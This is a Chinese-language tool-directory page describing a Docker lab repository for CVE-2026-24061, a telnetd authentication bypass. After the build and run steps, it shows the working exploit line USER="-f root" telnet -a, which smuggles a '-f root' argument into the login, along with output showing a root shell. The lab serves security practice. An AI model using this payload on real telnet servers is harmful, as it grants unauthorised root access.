Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061-setup — 用于 CVE-2026-24061 的 Docker 设置 | Kitploit
工具/GitHubGitHub/shivam-bathla/cve-2026-24061-setup
身份验证与授权权限提升漏洞分析漏洞利用实验室与实践
GitHubshivam-bathla/cve-2026-24061-setup

CVE-2026-24061-setup

用于 CVE-2026-24061 的 Docker 设置

查看仓库
416个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 环境搭建

本仓库包含 CVE-2026-24061 的 Docker 配置。

安装 Docker 后,只需执行以下操作:

  1. 克隆此仓库。

  2. 运行以下命令:

root@kitploit:~
sudo docker build . --tag telnetd-auth-bypass
  1. Docker 镜像构建完成后,我们可以使用以下命令启动容器:
root@kitploit:~
sudo docker run -dt --rm --name test telnetd-auth-bypass
  1. 完成后,你的漏洞实验环境就准备好了,可以开始利用了。只需发送 payload 即可获得 root shell :)
root@kitploit:~
kali@kali:~$ USER="-f root" telnet -a 172.17.0.2
Trying 172.17.0.2...
Connected to 172.17.0.2.
Escape character is '^]'.

Linux 6.12.25-amd64 (5321b63dbc56) (pts/1)

Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.12.25-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@5321b63dbc56:~# 

更多详情,请参阅我关于 Telnet 认证绕过至 root 漏洞 的文章。

下载工具